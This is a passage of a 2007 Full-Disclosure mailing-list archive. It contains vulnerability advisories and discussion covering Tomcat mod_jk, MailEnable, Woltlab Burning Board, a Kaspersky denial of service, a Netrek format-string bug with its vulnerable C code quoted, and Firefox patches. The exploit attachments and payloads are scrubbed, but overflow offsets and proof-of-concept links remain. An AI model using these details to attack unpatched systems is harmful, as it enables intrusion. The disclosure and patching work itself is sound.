(=?ISO-8859-1?Q?Knud_Erik_H=F8jgaard?=) Date: Fri, 2 Mar 2007 15:30:29 +0100 Subject: [Full-disclosure] Knorr.de SQL Injection and XSS Vulnerabilities In-Reply-To: <20070302102325.2admma4uco4kg488@www.gjl-network.net> References: <20070302102325.2admma4uco4kg488@www.gjl-network.net> Message-ID: On 3/2/07, sbauer at gjl-network.net wrote: > Significance: Very Critical For who, the sauce-people? Not for me. > All problems found have been discussed with Unilever, the mother > company of Knorr and > have been fixed before the release of this document. Sooo, why should anyone besides you and the sauce-people care? -- kokanin From sbauer at gjl-network.net Fri Mar 2 14:46:22 2007 From: sbauer at gjl-network.net (Sebastian Bauer) Date: Fri, 02 Mar 2007 15:46:22 +0100 Subject: [Full-disclosure] Knorr.de SQL Injection and XSS Vulnerabilities In-Reply-To: References: <20070302102325.2admma4uco4kg488@www.gjl-network.net> Message-ID: <20070302154622.zucaj3lshwccsw8g@www.gjl-network.net> The point why I rated those problems as high risk was that due to this problems free access to all user data was possible. And problems that will offer any kind of user data (including unencrypted passwords) is a significant security risk from my point of view (see the latest problems regarding StudiVZ). A lot of people are using the same password for websites, email and so on. And getting a password using this security hole makes it also possible to log in to a lot of email accounts that don't belong to you. -- ============================== Sebastian Bauer http://blog.gjl-network.net Zitat von Knud Erik H?jgaard : > On 3/2/07, sbauer at gjl-network.net wrote: > >> Significance: Very Critical > > For who, the sauce-people? Not for me. > >> All problems found have been discussed with Unilever, the mother >> company of Knorr and >> have been fixed before the release of this document. > > Sooo, why should anyone besides you and the sauce-people care? > > -- > kokanin From joe.hancock at gmail.com Fri Mar 2 14:43:36 2007 From: joe.hancock at gmail.com (Joe Hancock) Date: Fri, 2 Mar 2007 14:43:36 +0000 Subject: [Full-disclosure] Knorr.de SQL Injection and XSS Vulnerabilities In-Reply-To: References: <20070302102325.2admma4uco4kg488@www.gjl-network.net> Message-ID: I was also going to query the way vulnerabilities are rated on a personal level here... Significance: Double Plus Ungood It's always nice to see problems being solved instead of just targeted, while maintaining disclosure though Sebastian. Regards, Joe. On 02/03/07, Knud Erik H?jgaard wrote: > On 3/2/07, sbauer at gjl-network.net wrote: > > > Significance: Very Critical> > For who, the sauce-people? Not for me. > > > All problems found have been discussed with Unilever, the mother > > company of Knorr and > > have been fixed before the release of this document. > > Sooo, why should anyone besides you and the sauce-people care? > > -- > kokanin > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From lcamtuf at dione.ids.pl Fri Mar 2 14:56:09 2007 From: lcamtuf at dione.ids.pl (Michal Zalewski) Date: Fri, 2 Mar 2007 15:56:09 +0100 (CET) Subject: [Full-disclosure] Knorr.de SQL Injection and XSS Vulnerabilities In-Reply-To: References: <20070302102325.2admma4uco4kg488@www.gjl-network.net> Message-ID: > Significance: Very Critical I'm very pro-disclosure. I do see a point in disclosing flaws in software or hardware we might use. I do see a point in reporting flaws in websites we rely on (banks, online shops). Hey, there might even be a weak case for shaming security vendors, IT companies, or fellow professionals by exposing flaws on their sites; it's mean, but it may have some value. But I'm puzzled at to what's the point in telling the world about a generic flaw in soup-maker's website, where - really - the number of people even marginally affected is truly negligible? Talk to them, tell them, have it fixed; if they're nice, they might even give you a gift or some sort (year's worth of instant noodles, I'm thinking). Blog it if you find it important to tell others about your achievement, but really, that's where it should end. /mz From mu-b at digit-labs.org Fri Mar 2 17:31:31 2007 From: mu-b at digit-labs.org (mu-b) Date: Fri, 02 Mar 2007 17:31:31 +0000 Subject: [Full-disclosure] MailEnable v2.37 APPEND exploit Message-ID: <45E85F73.40401@digit-labs.org> Attached is another exploit for the MailEnable Pro/Ent <= 2.37 (including the latest). The vulnerability is a bog-standard stack based overflow in the call at offset 0x00417CD6 (MEIMAPS.exe, v2.37). --------------------------------------------------------------------------- (mu-b at digit-labs.org) -------------- next part -------------- A non-text attachment was scrubbed... Name: maildisable-v4.pl Type: text/x-perl Size: 4188 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070302/1670b40b/attachment.bin From zdi-disclosures at 3com.com Fri Mar 2 17:56:56 2007 From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com) Date: Fri, 2 Mar 2007 09:56:56 -0800 Subject: [Full-disclosure] ZDI-07-008: Apache Tomcat JK Web Server Connector Long URL Stack Overflow Vulnerability Message-ID: ZDI-07-008: Apache Tomcat JK Web Server Connector Long URL Stack Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-07-008.html March 2, 2007 -- CVE ID: CVE-2007-0774 -- Affected Vendor: Apache -- Affected Products: Tomcat JK Web Server Connector 1.2.19 Tomcat JK Web Server Connector 1.2.20 Tomcat 4.1.34 Tomcat 5.5.20 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since February 26, 2007 by Digital Vaccine protection filter ID 5152. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apache Tomcat JK Web Server Connector. Authentication is not required to exploit this vulnerability. The specific flaw exists in the URI handler for the mod_jk.so library, map_uri_to_worker(), defined in native/common/jk_uri_worker_map.c. When parsing a long URL request, the URI worker map routine performs an unsafe memory copy. This results in a stack overflow condition which can be leveraged to execute arbitrary code. -- Vendor Response: Apache has issued an update to correct this vulnerability. More details can be found at: http://tomcat.apache.org/connectors-doc/miscellaneous/changelog.html -- Disclosure Timeline: 2007.02.16 - Vulnerability reported to vendor 2007.02.26 - Digital Vaccine released to TippingPoint customers 2007.03.02 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by an anonymous researcher. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. From samuschie at yahoo.de Fri Mar 2 18:24:22 2007 From: samuschie at yahoo.de (SaMuschie) Date: Fri, 2 Mar 2007 19:24:22 +0100 (CET) Subject: [Full-disclosure] Woltlab Burning Board (wbb) 2.3.6 CSRF/XSS - 0day Message-ID: <20070302182422.45737.qmail@web27811.mail.ukl.yahoo.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 +--------------------------------------- - -- - | SaMuschie Research Labs proudly presents . . . +------------------------------------------- -- - - | Application: Woltlab Burning Board (wbb) | Version: 2.3.6 (others not testet) | Vuln./Exploit Type: CSRF/XSS | Status: 0day +----------------------------------------- -- - - | Discovered by: Samenspender | Released: 20070302 | SaMuschie Release Number: 5 +------------------------------- - -- - CSRF/XSS Exploit: cat < wetpussy.html
EOF +----------------------------- -- - | Lameness Disclaimer +------------------------------------- - -- - - | SaMuschie Research Labs was founded to publish | vulnerabilities within well known software products, | which are easy to discover and exploit. | | SaMuschie researchers just spend a minimum of time | and knowledge for each vulnerability. Hence readers of | this advisory are requested not to ask any questions | to the researchers.... they don't know the answer ;) +---------------------------------- - -- - - -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFF6AyiMFgfGpQK8VERAsieAJwIMk+g0Y70cV6dR5YtsMfq4U+5fgCfWWzD Qg6at+bMTnvHbw0SYyXk5ko= =7wPg -----END PGP SIGNATURE----- ___________________________________________________________ Der fr?he Vogel f?ngt den Wurm. Hier gelangen Sie zum neuen Yahoo! Mail: http://mail.yahoo.de From labs-no-reply at idefense.com Fri Mar 2 18:35:21 2007 From: labs-no-reply at idefense.com (iDefense Labs) Date: Fri, 02 Mar 2007 13:35:21 -0500 Subject: [Full-disclosure] iDefense Security Advisory 03.02.07: Kaspersky AntiVirus UPX File Decompression DoS Vulnerability Message-ID: <45E86E69.6040802@idefense.com> Kaspersky AntiVirus UPX File Decompression DoS Vulnerability iDefense Security Advisory 03.02.07 http://labs.idefense.com/intelligence/vulnerabilities/ Mar 02, 2007 I. BACKGROUND Kaspersky Antivirus is a popular client and gateway virus scanner for Unix and Windows. UPX, the ultimate packer for executables, is a method for compressing executable files to reduce their size on disk. For more information, visit the vendor's site at the following URL. http://www.kaspersky.com/ II. DESCRIPTION Remote exploitation of a denial of service (DoS) vulnerability in Kaspersky Lab's Antivirus could allow an attacker to conduct a DoS attack on a targeted host. The antivirus engine is vulnerable to a DoS condition when processing an executable packed with UPX compression. Malformed compressed data causes the decompression routine to enter an infinite loop. Specifically, a negative data offset results in the same compressed data chunk being processed endlessly. III. ANALYSIS Exploitation allows an attacker to conduct a DoS attack. If this attack is conducted against an e-mail gateway running Kaspersky, legitimate clients may be unable to send e-mail through the server. The infinite loop being executed consists of a short sequence of instructions, which results in maximum CPU usage. On a client desktop, the infinite loop will render the machine nearly unusable. On a server, it severely degrades the quality of service of other applications running. IV. DETECTION iDefense has confirmed the existence of this vulnerability in Kaspersky Labs Antivirus Engine version 6.0.1.411 for Windows and 5.5-10 for Linux. Previous versions may also be affected. Any products that use the scanning engine are also affected, which includes the Kaspersky e-mail gateway scanner. V. WORKAROUND iDefense is currently unaware of any workarounds for this issue. VI. VENDOR RESPONSE Kaspersky Lab reports that it has fixed this vulnerability as of February 7th, 2007. In addition, they stated the following. "There is no need to download any special patches. All installed Kaspersky Lab products are updated automatically through the regular signature-update functionality. There is not need to contact Kaspersky Lab to obtain this fix." VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 01/24/2007 Initial vendor notification 03/01/2007 Initial vendor response 03/02/2007 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2007 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From tbiehn at gmail.com Fri Mar 2 19:04:42 2007 From: tbiehn at gmail.com (T Biehn) Date: Fri, 2 Mar 2007 14:04:42 -0500 Subject: [Full-disclosure] MailEnable v2.37 APPEND exploit In-Reply-To: <45E85F73.40401@digit-labs.org> References: <45E85F73.40401@digit-labs.org> Message-ID: <2d6724810703021104p2fd7f786udac77e5fe7a0d3ea@mail.gmail.com> Stop Disclosin' On 3/2/07, mu-b wrote: > > Attached is another exploit for the MailEnable Pro/Ent <= 2.37 (including > the > latest). The vulnerability is a bog-standard stack based overflow in the > call at offset 0x00417CD6 (MEIMAPS.exe, v2.37). > > > --------------------------------------------------------------------------- > (mu-b at digit-labs.org) > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070302/f0b9ece9/attachment.html From walt.williams at gmail.com Fri Mar 2 14:51:09 2007 From: walt.williams at gmail.com (Walt Williams) Date: Fri, 2 Mar 2007 09:51:09 -0500 Subject: [Full-disclosure] March 2nd Chicago 2600/DefCon 312 Meeting Information In-Reply-To: References: <28326b7c0702281412m607ff66av76c67652cb3763ef@mail.gmail.com> Message-ID: <1dfe5f1d0703020651t4fc0342ck6d55f042de375adf@mail.gmail.com> http://2600.meetup.com/232/ On 3/1/07, Dude VanWinkle wrote: > Does anyone know if there is a NYC 2600 group? I checked the site, but > couldnt find any listings.. > > -JP > > On 2/28/07, Steven McGrath wrote: > > The March Chicago 2600 Meeting is near! The meeting will be Friday, > > March 2nd at the Neighborhood Boys and Girls Club and will feature much > > of the same usual fun that all of you have grown to expect! > > > > [Presentation Information] > > - 9:00pm - Hacklab: Current Progress (Maniac, et al.) > > - 10:00pm - How to build a public server (Maniac) > > - After hours - Wii, Music, Socializing, etc. > > > > [General Information] > > - Meeting Time: 7.00pm - Approx. 3-5am > > - Meeting Date: Friday, March 2nd > > - Place : 2501 W Irving Park Road, Chicago > > - More Info : http://chicago2600.net > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- Walt From aluigi at autistici.org Fri Mar 2 21:43:30 2007 From: aluigi at autistici.org (Luigi Auriemma) Date: Fri, 2 Mar 2007 22:43:30 +0100 Subject: [Full-disclosure] Limited format string in Netrek 2.12.0 Message-ID: <20070302224330.c9769b1b.aluigi@autistici.org> ####################################################################### Luigi Auriemma Application: Netrek http://www.netrek.org Versions: <= 2.12.0 (Vanilla server) Platforms: *nix and Windows Bug: format string Exploitation: remote (in-game) Date: 02 Mar 2007 Author: Luigi Auriemma e-mail: aluigi at autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== Netrek is a well known real-time strategy game inspired to Star Trek. ####################################################################### ====== 2) Bug ====== The Vanilla server is affected by a format string vulnerability caused by the calling of the pmessage2() function without the needed format argument. The bug is located in new_warning() and can be exploitated through the locking of a player (the same attacker too) who is using a malformed nickname. Note that the EVENTLOG switch must be enabled for exploiting this vulnerability (default is disabled). from ntserv/warning.c: void new_warning(int index, const char *fmt, ...) { char temp[150]; va_list args; va_start(args, fmt); vsprintf(temp, fmt, args); ... if (eventlog) { char from_str[9]="WRN->\0\0\0"; strcat(from_str, me->p_mapchars); pmessage2(0, 0, from_str, me->p_no, temp); } ####################################################################### =========== 3) The Code =========== http://aluigi.org/poc/netrekfs.zip ####################################################################### ====== 4) Fix ====== Version 2.12.1 ####################################################################### --- Luigi Auriemma http://aluigi.org http://mirror.aluigi.org From security at mandriva.com Fri Mar 2 22:45:01 2007 From: security at mandriva.com (security at mandriva.com) Date: Fri, 02 Mar 2007 15:45:01 -0700 Subject: [Full-disclosure] [ MDKSA-2007:050-1 ] - Updated Firefox packages fix multiple vulnerabilities Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDKSA-2007:050-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : mozilla-firefox Date : March 2, 2007 Affected: 2007.0, Corporate 3.0, Corporate 4.0 _______________________________________________________________________ Problem Description: A number of security vulnerabilities have been discovered and corrected in the latest Mozilla Firefox program, version 1.5.0.10. This update provides the latest Firefox to correct these issues. Update: A regression was found in the latest Firefox packages provided where changes to library paths caused applications that depended on the NSS libraries (such as Thunderbird and Evolution) to fail to start or fail to load certain SSL-related security components. These new packages correct that problem and we apologize for any inconvenience the previous update may have caused. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6077 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0008 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0009 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0775 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0777 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0778 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0779 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0780 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0800 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0981 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0995 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0996 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1092 http://www.mozilla.org/security/announce/2007/mfsa2007-01.html http://www.mozilla.org/security/announce/2007/mfsa2007-02.html http://www.mozilla.org/security/announce/2007/mfsa2007-03.html http://www.mozilla.org/security/announce/2007/mfsa2007-04.html http://www.mozilla.org/security/announce/2007/mfsa2007-05.html http://www.mozilla.org/security/announce/2007/mfsa2007-06.html http://www.mozilla.org/security/announce/2007/mfsa2007-07.html http://www.mozilla.org/security/announce/2007/mfsa2007-08.html _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.0: 411bc0bdd8dc32950a84c77ed3319508 2007.0/i586/libmozilla-firefox1.5.0.10-1.5.0.10-2mdv2007.0.i586.rpm 9ceb031931003fb861882f4455c6648b 2007.0/i586/libmozilla-firefox1.5.0.10-devel-1.5.0.10-2mdv2007.0.i586.rpm db615eadf763927182c8657d11b1ae54 2007.0/i586/libnspr4-1.5.0.10-2mdv2007.0.i586.rpm bd7dca3e972f552b5dd347822e17f1e1 2007.0/i586/libnspr4-devel-1.5.0.10-2mdv2007.0.i586.rpm bb4709aa4bf277e32c25e07d93641802 2007.0/i586/libnspr4-static-devel-1.5.0.10-2mdv2007.0.i586.rpm babf7d44d0340cd51f45249d3002180e 2007.0/i586/libnss3-1.5.0.10-2mdv2007.0.i586.rpm 19a967982b748b879b1904d5bcea174d 2007.0/i586/libnss3-devel-1.5.0.10-2mdv2007.0.i586.rpm 6333bab7a5d530836fa5a64383bcdd30 2007.0/i586/mozilla-firefox-1.5.0.10-2mdv2007.0.i586.rpm 72672b4bbfcc4f13d5820a4c11bca547 2007.0/SRPMS/mozilla-firefox-1.5.0.10-2mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 9fe9779d9d02f0aa73d28096cc237d00 2007.0/x86_64/lib64mozilla-firefox1.5.0.10-1.5.0.10-2mdv2007.0.x86_64.rpm 3c0a879b450f5c2569eb81d397a82906 2007.0/x86_64/lib64mozilla-firefox1.5.0.10-devel-1.5.0.10-2mdv2007.0.x86_64.rpm 338d81330e754d5ffd22dea67c2fbfd2 2007.0/x86_64/lib64nspr4-1.5.0.10-2mdv2007.0.x86_64.rpm 0c840ec9a78c48d975db6bca80e53caa 2007.0/x86_64/lib64nspr4-devel-1.5.0.10-2mdv2007.0.x86_64.rpm 3f1ba2da63bf990b3958f184bdf4d96f 2007.0/x86_64/lib64nspr4-static-devel-1.5.0.10-2mdv2007.0.x86_64.rpm cd9ef9efe9f859467a07bfc20899156d 2007.0/x86_64/lib64nss3-1.5.0.10-2mdv2007.0.x86_64.rpm d6243e7d7c76a5ff5a418f7304cdcff2 2007.0/x86_64/lib64nss3-devel-1.5.0.10-2mdv2007.0.x86_64.rpm 0fec2d70c6a797521304598b802d03b1 2007.0/x86_64/mozilla-firefox-1.5.0.10-2mdv2007.0.x86_64.rpm 72672b4bbfcc4f13d5820a4c11bca547 2007.0/SRPMS/mozilla-firefox-1.5.0.10-2mdv2007.0.src.rpm Corporate 3.0: 24fbf58752279b3a5ec8d186d7c6142b corporate/3.0/i586/libnspr4-1.5.0.10-1.1.C30mdk.i586.rpm cc59dd85bcdc065ed4ee7f3d299e971a corporate/3.0/i586/libnspr4-devel-1.5.0.10-1.1.C30mdk.i586.rpm 284b6bf1210fb854361a9af3062528e1 corporate/3.0/i586/libnspr4-static-devel-1.5.0.10-1.1.C30mdk.i586.rpm cf17ffa7ff1734b850c7f7a5b7f780ee corporate/3.0/i586/libnss3-1.5.0.10-1.1.C30mdk.i586.rpm 82e74bce4abb564958d0225bc94687d6 corporate/3.0/i586/libnss3-devel-1.5.0.10-1.1.C30mdk.i586.rpm 5af5da7a1f51c609568f03b2026c0687 corporate/3.0/i586/mozilla-firefox-1.5.0.10-1.1.C30mdk.i586.rpm df2d940bf4af073e1dc983c1143a8079 corporate/3.0/i586/mozilla-firefox-devel-1.5.0.10-1.1.C30mdk.i586.rpm efd17411a1dc5bed3d7e79f0a28b4073 corporate/3.0/SRPMS/mozilla-firefox-1.5.0.10-1.1.C30mdk.src.rpm Corporate 3.0/X86_64: be6fa4a501b973f9016716ae6ffb1b25 corporate/3.0/x86_64/lib64nspr4-1.5.0.10-1.1.C30mdk.x86_64.rpm a06bb78d6531ffac3e750236a0cb13de corporate/3.0/x86_64/lib64nspr4-devel-1.5.0.10-1.1.C30mdk.x86_64.rpm 2f2dd393236be80e8f8ca226145115e7 corporate/3.0/x86_64/lib64nspr4-static-devel-1.5.0.10-1.1.C30mdk.x86_64.rpm 3a42bca7fd7ab26e65bf0a4ca7485db1 corporate/3.0/x86_64/lib64nss3-1.5.0.10-1.1.C30mdk.x86_64.rpm 68cef069c9e2d4f1336c58e8e5f126ca corporate/3.0/x86_64/lib64nss3-devel-1.5.0.10-1.1.C30mdk.x86_64.rpm 0bd6c6adc8fd1be8d3b02fb5505c9330 corporate/3.0/x86_64/mozilla-firefox-1.5.0.10-1.1.C30mdk.x86_64.rpm 27262a966199c19006327fa21dab1f69 corporate/3.0/x86_64/mozilla-firefox-devel-1.5.0.10-1.1.C30mdk.x86_64.rpm efd17411a1dc5bed3d7e79f0a28b4073 corporate/3.0/SRPMS/mozilla-firefox-1.5.0.10-1.1.C30mdk.src.rpm Corporate 4.0: 0f782ea68bc9177e333dd77c26eeec7f corporate/4.0/i586/libnspr4-1.5.0.10-1.1.20060mlcs4.i586.rpm 408511a886dd0619f4ae9a1d93137eeb corporate/4.0/i586/libnspr4-devel-1.5.0.10-1.1.20060mlcs4.i586.rpm 6b3ad9cf7c2f4b7a008c6fd9c584289b corporate/4.0/i586/libnspr4-static-devel-1.5.0.10-1.1.20060mlcs4.i586.rpm 31927dd82ca439052fe166e6b2864e07 corporate/4.0/i586/libnss3-1.5.0.10-1.1.20060mlcs4.i586.rpm 021eef345d030d8112f227b0b2c3a0f6 corporate/4.0/i586/libnss3-devel-1.5.0.10-1.1.20060mlcs4.i586.rpm 2485f65a1860840e7abe7cd5a447c538 corporate/4.0/i586/mozilla-firefox-1.5.0.10-1.1.20060mlcs4.i586.rpm ef609ec54c3e70b47067668f68c74e65 corporate/4.0/i586/mozilla-firefox-devel-1.5.0.10-1.1.20060mlcs4.i586.rpm 64e5ea6cd7dc856aa4f7eda630e40d14 corporate/4.0/SRPMS/mozilla-firefox-1.5.0.10-1.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: fab1a497ea9801a29637f049e520422b corporate/4.0/x86_64/lib64nspr4-1.5.0.10-1.1.20060mlcs4.x86_64.rpm 647d403327794eb30e81e6b91b407dd1 corporate/4.0/x86_64/lib64nspr4-devel-1.5.0.10-1.1.20060mlcs4.x86_64.rpm 247c6c555fe4917bbdf3ae884ac309ba corporate/4.0/x86_64/lib64nspr4-static-devel-1.5.0.10-1.1.20060mlcs4.x86_64.rpm 710e426e4200912e2b4718d1c0613c58 corporate/4.0/x86_64/lib64nss3-1.5.0.10-1.1.20060mlcs4.x86_64.rpm 2efe3ddeb772f3d706f429bccd34675c corporate/4.0/x86_64/lib64nss3-devel-1.5.0.10-1.1.20060mlcs4.x86_64.rpm 13e414365c4f1d3768a375cf29a40aa4 corporate/4.0/x86_64/mozilla-firefox-1.5.0.10-1.1.20060mlcs4.x86_64.rpm 261d63f5547804f20ee022290429c866 corporate/4.0/x86_64/mozilla-firefox-devel-1.5.0.10-1.1.20060mlcs4.x86_64.rpm 64e5ea6cd7dc856aa4f7eda630e40d14 corporate/4.0/SRPMS/mozilla-firefox-1.5.0.10-1.1.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFF6H18mqjQ0CJFipgRAna2AJ9Qa8Vf923jNIzai9QzQOOS4NRETgCgyICD +eNPSjeb5EQGZ6E5dYWPNSM= =AgMP -----END PGP SIGNATURE----- From falco at gentoo.org Fri Mar 2 23:13:15 2007 From: falco at gentoo.org (Raphael Marichez) Date: Sat, 3 Mar 2007 00:13:15 +0100 Subject: [Full-disclosure] [ GLSA 200703-04 ] Mozilla Firefox: Multiple vulnerabilities Message-ID: <20070302231315.GA16853@falco.falcal.net> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200703-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Mozilla Firefox: Multiple vulnerabilities Date: March 02, 2007 Bugs: #165555 ID: 200703-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been reported in Mozilla Firefox, some of which may allow user-assisted arbitrary remote code execution. Background ========== Mozilla Firefox is a popular open-source web browser from the Mozilla Project. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 www-client/mozilla-firefox < 2.0.0.2 *>= 1.5.0.10 >= 2.0.0.2 2 www-client/mozilla-firefox-bin < 2.0.0.2 *>= 1.5.0.10 >= 2.0.0.2 ------------------------------------------------------------------- 2 affected packages on all of their supported architectures. ------------------------------------------------------------------- Description =========== Tom Ferris reported a heap-based buffer overflow involving wide SVG stroke widths that affects Mozilla Firefox 2 only. Various researchers reported some errors in the JavaScript engine potentially leading to memory corruption. Mozilla Firefox also contains minor vulnerabilities involving cache collision and unsafe pop-up restrictions, filtering or CSS rendering under certain conditions. Impact ====== An attacker could entice a user to view a specially crafted web page that will trigger one of the vulnerabilities, possibly leading to the execution of arbitrary code. It is also possible for an attacker to spoof the address bar, steal information through cache collision, bypass the local files protection mechanism with pop-ups, or perform cross-site scripting attacks, leading to the exposure of sensitive information, like user credentials. Workaround ========== There is no known workaround at this time for all of these issues, but most of them can be avoided by disabling JavaScript. Resolution ========== Users upgrading to the following releases of Mozilla Firefox should note that this upgrade has been found to lose the saved passwords file in some cases. The saved passwords are encrypted and stored in the 'signons.txt' file of ~/.mozilla/ and we advise our users to save that file before performing the upgrade. All Mozilla Firefox 1.5 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/mozilla-firefox-1.5.0.10" All Mozilla Firefox 1.5 binary users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/mozilla-firefox-bin-1.5.0.10" All Mozilla Firefox 2.0 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/mozilla-firefox-2.0.0.2" All Mozilla Firefox 2.0 binary users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/mozilla-firefox-bin-2.0.0.2" References ========== [ 1 ] CVE-2006-6077 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6077 [ 2 ] CVE-2007-0775 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0775 [ 3 ] CVE-2007-0776 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0776 [ 4 ] CVE-2007-0777 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0777 [ 5 ] CVE-2007-0778 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0778 [ 6 ] CVE-2007-0779 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0779 [ 7 ] CVE-2007-0780 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0780 [ 8 ] CVE-2007-0800 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0800 [ 9 ] CVE-2007-0801 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0801 [ 10 ] CVE-2007-0981 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0981 [ 11 ] CVE-2007-0995 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0995 [ 12 ] Mozilla password loss bug https://bugzilla.mozilla.org/show_bug.cgi?id=360493#c366 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200703-04.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 481 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070303/f5100796/attachment.bin From falco at gentoo.org Sat Mar 3 16:34:19 2007 From: falco at gentoo.org (Raphael Marichez) Date: Sat, 3 Mar 